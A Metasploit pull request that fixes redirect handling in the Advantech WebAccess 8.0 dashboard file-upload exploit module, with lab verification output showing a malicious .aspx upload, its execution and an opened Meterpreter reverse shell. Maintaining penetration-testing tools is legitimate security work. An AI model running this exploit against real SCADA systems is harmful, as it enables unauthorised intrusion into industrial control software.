### PR TITLE
update advantech_webaccess_dashboard_file_upload 

### DIFF
--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -56,17 +56,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def vuln_version?
-    res = send_request_cgi(
+    res = send_request_cgi!(
       'method'   => 'GET',
       'uri'      => target_uri.to_s
     )
-
-    if res.redirect?
-      res = send_request_cgi(
-        'method' => 'GET',
-        'uri'    => normalize_uri(res.redirection)
-      )
-    end
 
     ver = res && res.body ? version_match(res.body) : nil
     true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
@@ -128,4 +121,3 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless exec_file?(filename)
   end
 end
-


### PR DESCRIPTION
@wchen-r7 @dmohanty-r7  fix send_request_cgi redirection issues https://github.com/rapid7/metasploit-framework/issues/6806
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `exploit/windows/scada/advantech_webaccess_dashboard_file_upload`

```
msf exploit(advantech_webaccess_dashboard_file_upload) > show options

Module options (exploit/windows/scada/advantech_webaccess_dashboard_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.176.229   yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path of Advantech WebAccess 8.0
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Advantech WebAccess 8.0


msf exploit(advantech_webaccess_dashboard_file_upload) > check
[*] The target appears to be vulnerable.
msf exploit(advantech_webaccess_dashboard_file_upload) > run

[*] Started reverse TCP handler on 172.16.176.1:4444
[*] 172.16.176.229:80 - Uploading malicious file...
[*] 172.16.176.229:80 - Executing fgTwi.aspx...
[*] Sending stage (957999 bytes) to 172.16.176.229
[*] Meterpreter session 1 opened (172.16.176.1:4444 -> 172.16.176.229:1063) at 2016-05-05 09:51:36 -0500

meterpreter > sysinfo
Computer        : GOOGLE
OS              : Windows 7 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > exit
```
